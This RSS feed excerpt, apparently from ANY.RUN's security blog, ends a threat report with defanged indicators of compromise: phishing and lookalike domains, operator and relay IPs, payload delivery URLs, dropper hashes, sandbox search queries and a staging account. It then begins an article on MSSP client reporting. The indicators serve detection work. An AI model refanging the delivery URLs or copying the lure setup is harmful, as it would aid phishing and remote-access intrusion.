                                                <td class="wpdt-cell "
                                            data-cell-id="C29"
                    data-col-index="2"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        The Chameleon page used logos and a live website screenshot pulled from public branding services to dress one credential form as the target company’s own portal                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-398'>
table#wpdtSimpleTable-398{ table-layout: fixed !important; }
table#wpdtSimpleTable-398 td, table.wpdtSimpleTable398 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">IOCs </h2>



<h3 class="wp-block-heading">Highest-value indicators </h3>



<ul class="wp-block-list">
<li>/m/js/utils.js — URI path shared by every page of the kit, unchanged for seven months across 170 domains </li>



<li>url:&#8221;/m/js/utils.js$&#8221; and url:&#8221;/e-sign_files/Icon-pdf-file-svg.png$&#8221; OR url:&#8221;eDocusign.php$&#8221; OR url:&#8221;/e-sign.php$&#8221; — the two sandbox-telemetry queries that enumerate the static export and the PHP build </li>



<li>instance-t7o41i-relay[.]screenconnect[.]com — remote-management command channel </li>



<li>/.DocuSign/ with the file set index.php, eDocusign.php, e-sign.php, download.php, settings.php — the PHP build, deployed both at document root and under a nested review.signal-doc.cloud/ path </li>



<li>hxxps://localcontex[.]online/AdobecloudReader/pdf_Reader_en_install.msi, hxxps://localcontex[.]online/review.signal-doc.cloud/.DocuSign/ — current delivery paths of the management-agent payload </li>
</ul>



<h3 class="wp-block-heading">Domains </h3>



<ul class="wp-block-list">
<li>gddfzxa[.]online </li>



<li>gddfzxa[.]online </li>



<li>ghs.coorpes[.]com </li>



<li>greaterheights[.]sbs </li>



<li>mmswerod[.]sbs </li>



<li>greenbullet[.]ba </li>



<li>emsafetoproceedtaward[.]top </li>



<li>maillive[.]sbs </li>



<li>arubanetworks-inc[.]com </li>



<li>sharepointer-dr[.]com </li>



<li>stubborn-academy[.]icu </li>



<li>corporate-sync-gate[.]net </li>



<li>legacy-bridge-node[.]net </li>



<li>conferenceuniverses[.]buzz </li>



<li>zerichoproject[.]org </li>



<li>pdfsecurtoview[.]sbs, pdfsecurtoview[.]cfd, pdfsecurtoview[.]info </li>



<li>pdfsecurtoview365[.]sbs, pdfsecurtoview365[.]cfd, pdfsecurtoviewsuite[.]sbs </li>



<li>pdfsecurtoviewothers[.]sbs, pdfsecurtoviewothers[.]cfd </li>



<li>docsendsr[.]online, docseed[.]online, docseedn[.]online </li>



<li>documentsonitustechnologies[.]sbs, downloaddocumentcontechbuilding[.]sbs, documentationreviewdocument2026review[.]sbs </li>



<li>selectivelife01[.]sbs, pikecac[.]cfd, qrcoderuser[.]cfd, fincapitalxcom[.]cfd </li>



<li>allshore-io[.]cam, sharerpoint[.]cam, voicermailsmessager[.]cam, keepsecurepasserword[.]cam </li>



<li>giiro[.]net, expressdocumentdelivery[.]org, aviationpioneers[.]info </li>



<li>ambitiousaboutautismorguk[.]com, solarengyloanfunds[.]com — lookalike domains of a UK charity and of a victim organisation, used for /verify/ credential stages </li>



<li>checkingweb[.]net — counterfeit PDF viewer serving the licensing-themed batch dropper </li>



<li>cellumbio[.]com — sending domain of the licensing-themed lure mail </li>



<li>mail.wirsann[.]com, mail.boratlongyear[.]com — lure sending relays </li>



<li>sqrd.m365.sharedfile[.]online, sqrd.m36s.sharedfile[.]tech, shared.file.nn365[.]cloud, shared.note.nn365[.]cloud, shared.file.cnrv[.]tech, file.shared.cnrv[.]tech,loq.file.cnrv[.]online, m36nx.file.cnrv[.]online, file.shared.m36s[.]site, file.shared.myscript[.]sbs — Microsoft 365 document lures on the token-fragment paths </li>



<li>usoffweb69[.]top, netcoxweb[.]top, coxnetwork[.]top, doc.lauraice[.]xyz, docuread[.]im, docusign.web-viewww[.]es — DocuSign-themed hosts serving the PHP build under nested /doc/ and/dc/ paths </li>
</ul>



<h3 class="wp-block-heading">Addresses </h3>



<ul class="wp-block-list">
<li>207.189.19[.]40:26688 — remote-desktop foothold </li>



<li>185.174.102[.]34 — GSuite panel </li>



<li>190.123.46[.]122 — kit origin server </li>



<li>188.127.227[.]18, 141.133.174[.]208 — sending relays </li>



<li>91.92.41[.]114:8041, 212.189.40[.]73:8041, 155.254.26[.]180:8041, 64.204.180[.]203:8040 — self-hosted ScreenConnect servers behind the staged installers </li>



<li>31.57.147[.]133, 31.57.38[.]60, 102.67.5[.]132, 191.101.130[.]42, 102.88.167[.]38 — operator addresses </li>
</ul>



<h3 class="wp-block-heading">Storage buckets </h3>



<ul class="wp-block-list">
<li>btconnect-com, totalmfgsys-com, vistagrandedairy-com, docsend-765676, docsends-756776, gsuitis-07971, invite-67976, rigibore-8989 </li>
</ul>



<h3 class="wp-block-heading">Files </h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-380"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="30"
           data-wpID="380"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        SHA-256                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        File                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        ae7af8159f06a059411411e5e816b415e32213371fb085ced1dc5679a0112c48                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        AdobePdf_Reader.zip                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Payload archive A                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        b59e7cb539c0b81a58f60d5ca0ed3df62d1856b29076720efbb7dd9411d99eec                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect.ClientSetup.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Remote-management client                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        9a03a0b65b2a2d27b348e583237d512a55f3f8287989abf7ffca0285d5f8e43d                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Q4_Report062.zip                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Payload archive B                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        a89a31ec605c0ed9cd263cbdea6ee4a2c6502ec81e5b3e8a3c9fb3de945405f9                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        SSAStatement.exe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Renamed genuine Adobe loader                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        842f0236ea2c2b7773054920e7a870e07869c4e99f84bd31ccfd215781b4f267                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        msvcp140.dll                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Substituted library                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        07682ca34a9bf18beb664088e55035a83306b95b31d4aaba242e9d67f8c378a3                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        index.html                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Lure page A                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        e769b2b4463e7d39320b65a49183ce4ff8c20459fa183e7b03f02e1b44420eb0                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe.html                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Lure page B                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        41734f8e6cc75b66f51638b76780f61a0b21ad9f77586e2665b7ab8d7e131936                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        pdf_Reader_en_install.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Hexnode management agent, 190 MB, Adobe theme                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        eb9274a1fb6064e784f9c0ce95c78007efcadc279d4ffcac13998a45ebf7b49f                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        DocusignEditSetup.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Hexnode management agent, 190 MB, DocuSign theme                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        3a8daf4e992ea34b71b259af85d4d12ca52d80b9e2b262bd5aa5922a5a955f9f                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        index.html                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Lure page A rebuilt 29 August, serving the management agent                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        c0eb04dcfa745653c466c34978a1f3b4e5041f526be8c2e46b8c722498ca746a                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        m/js/utils.js                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        The shared gate: blocklists, fingerprinting, traps, redirect constant                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        74e306072561731adf55afd4de461ec0736ca22c0b458a78e7512b2701341f28                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        m/js/captcha.js                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Challenge and verification module                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        394d7be5ecbe326062c1de1fb674bdcbb4dbe3ce03b4227994607047b832debd                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        m/js/fingerprint.js                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Browser fingerprinting module                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        c5f7083722fc5bee4e7a7109495348d3731e6b077919a6b679b9f5af885923cd                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        index.html                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Verification gate of a complete deployment                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        fd98c6881cadc47e7d425bbd4b992237a832e69fdfe872a90ba567ed58a148ad                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        chameleon.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Credential page, as served                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        375e49680fe4b4a62320bdcfd16b7bd75f6223a15d620c475c6988803b67d416                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        index.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        PHP build, visitor reporting and redirect                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A18"
                    data-col-index="0"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        fdd171cc26704218b0762a33650c0d1246c42cbe583a858684e1b6ac12b9bbe7                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B18"
                    data-col-index="1"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        eDocusign.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C18"
                    data-col-index="2"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        PHP build, blurred decoy document                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A19"
                    data-col-index="0"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        2b89225801591cd223e0cf0b1faa8e7b12e88d6b6bc6ec9f5e715171137553ac                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B19"
                    data-col-index="1"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        e-sign.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C19"
                    data-col-index="2"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        PHP build, download page                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A20"
                    data-col-index="0"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        7b03111fa24ce01054332f013b3fe8189d2b61897e7306666c73b086588a64a5                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B20"
                    data-col-index="1"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        download.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C20"
                    data-col-index="2"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        PHP build, payload delivery and download alert                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A21"
                    data-col-index="0"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        0d6b451bd58b904e7dd15ce3e28ea129f7f95c9d248944fbdacdf6fb1d2adc99                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B21"
                    data-col-index="1"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        settings.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C21"
                    data-col-index="2"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        PHP build, reporting configuration                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A22"
                    data-col-index="0"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        aac51e4016c50a705a26bd56435f0fd9685e53d6bc0cc6034b7370e76d7cb376                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B22"
                    data-col-index="1"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect.ClientSetup.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C22"
                    data-col-index="2"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        Staged client, relay91.92.41[.]114                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A23"
                    data-col-index="0"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        aefd71902453cc83104aa963d8d9051c875d93ddf40680616e8fa5e68565ea69                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B23"
                    data-col-index="1"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect.ClientSetup.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C23"
                    data-col-index="2"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        Staged client, relay212.189.40[.]73                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A24"
                    data-col-index="0"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        6f62a8380eb5038e253772033c0ebc1ddb951a042c4a1a90ba8755819dc74e53                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B24"
                    data-col-index="1"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe.ClientSetup.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C24"
                    data-col-index="2"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        Staged client, relay155.254.26[.]180                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A25"
                    data-col-index="0"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        d995ea6f1621c29cdd4353cfb8b36cd1336b34bc8b180b73ce52cd939060bf0f                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B25"
                    data-col-index="1"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe_Acrobat_V6trj.msi, Dotloop AgentSetup_V34.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C25"
                    data-col-index="2"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        Action1 agent under Adobe and Dotloop names                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A26"
                    data-col-index="0"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        463786717f51b710dbbb013437141e416b98d810dfaa9f4de90a4c4939bc66b9                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B26"
                    data-col-index="1"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe_AgentInstallerV367.exe,Dotloop_AgentInstallerV367.exe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C26"
                    data-col-index="2"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        Syncro agent under Adobe and Dotloop names                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A27"
                    data-col-index="0"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        90f8e6259ce27592c460d235aff104d7507dfff4e7889c34ab714cdb19944473                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B27"
                    data-col-index="1"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe Installer V3572.bat                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C27"
                    data-col-index="2"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        Dropper, Action1 agent                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A28"
                    data-col-index="0"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        38ba6bfe0cc2b7c5ff38f1f698e2c9bfdb52dd7937111967fddf785ba001e1f2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B28"
                    data-col-index="1"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        Amended_Agreement02026.vbs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C28"
                    data-col-index="2"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        Dropper, Action1 agent                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A29"
                    data-col-index="0"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        a450a84a60ce6646596feb2d6bea4c89a1b5b4e7d6325d5b7c2000982987411c                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B29"
                    data-col-index="1"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        Updated Service Agreement 2026.bat                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C29"
                    data-col-index="2"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        Dropper, ScreenConnect from object storage                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A30"
                    data-col-index="0"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        b1e55c9679f9aca94d66fdb08195cf8752f69f1d6896a5b2e60d979fca5a4036                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B30"
                    data-col-index="1"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        Update_6779.bat                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C30"
                    data-col-index="2"
                    data-row-index="29"
                    style="                    padding:10px;
                    "
                    >
                                        Dropper, ScreenConnect from64.204.180[.]203:8040                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-380'>
table#wpdtSimpleTable-380{ table-layout: fixed !important; }
table#wpdtSimpleTable-380 td, table.wpdtSimpleTable380 th { white-space: normal !important; }
</style>




<h3 class="wp-block-heading">Staging account </h3>



<ul class="wp-block-list">
<li>github[.]com/Ivan3900  </li>
</ul>
<p>The post <a href="https://any.run/cybersecurity-blog/csuite-attack-analysis/">CSuite Targets US and EU Organizations with Device-Code Phishing and Remote Access</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/csuite-attack-analysis/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How MSSPs Can Prove Their Value When “Nothing Happened”</title>
		<link>https://any.run/cybersecurity-blog/how-mssps-prove-value/</link>
					<comments>https://any.run/cybersecurity-blog/how-mssps-prove-value/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 17 Sep 2026 08:15:29 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23138</guid>

					<description><![CDATA[<p>For an MSSP, a quiet month can be a good month. No ransomware outbreak. No major account compromise. No business disruption. But it can also create an awkward conversation with the client: What exactly did we pay for this month? The problem is not that the SOC did nothing. Quite the opposite. Analysts may have [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/how-mssps-prove-value/">How MSSPs Can Prove Their Value When “Nothing Happened”</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">For an <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSP</a>, a quiet month can be a good month. </p>



<p class="wp-block-paragraph">No ransomware outbreak. No major account compromise. No business disruption. </p>



<p class="wp-block-paragraph">But it can also create an awkward conversation with the client: <strong>What exactly did we pay for this month?</strong> </p>



<p class="wp-block-paragraph">The problem is not that the SOC did nothing. Quite the opposite. Analysts may have investigated hundreds of suspicious files, URLs, emails, and alerts. They may have confirmed malicious activity, closed false positives, identified new infrastructure, and stopped cases from consuming more time or reaching higher escalation tiers. </p>



<p class="wp-block-paragraph">Most of that work simply happens behind the scenes. </p>



<p class="wp-block-paragraph">Making that work visible helps clients understand the service they are receiving and gives MSSPs stronger proof of value during reviews and renewals. </p>



<p class="wp-block-paragraph">The goal is not to overwhelm clients with more SOC data, but to show the activity that connects everyday investigations to business value. </p>



<h2 class="wp-block-heading"><strong>What Clients Actually Need to See</strong> </h2>



<p class="wp-block-paragraph">Clients do not need a longer list of alerts. They need a clearer picture of what their MSSP handled for them. </p>



<p class="wp-block-paragraph">That means reporting the outcomes behind the activity: </p>



<ul class="wp-block-list">
<li>how many threats were investigated; </li>



<li>how many were confirmed as malicious; </li>



<li>how many cases were closed without further escalation; </li>



<li>how quickly analysts reached a decision; </li>



<li>what new indicators or threat patterns were identified; </li>



<li>and what actions were recommended as a result. </li>
</ul>



<p class="wp-block-paragraph">This gives the client something much more meaningful than an incident count. </p>



<p class="wp-block-paragraph">It shows the volume of work handled by the SOC, the decisions analysts made, and the security value created along the way. </p>



<h2 class="wp-block-heading"><strong>Show the Work Behind Each Investigation</strong> </h2>



<p class="wp-block-paragraph">A closed case can still contain a lot of value for the client. </p>



<p class="wp-block-paragraph">For example, an analyst may have checked a suspicious email, opened the attachment in a sandbox, confirmed its behavior, found the domains or IPs it contacted, and recommended blocking them. </p>



<p class="wp-block-paragraph">Even if the case never became a major incident, that investigation produced evidence the MSSP can report. </p>


<div class="wp-block-image">
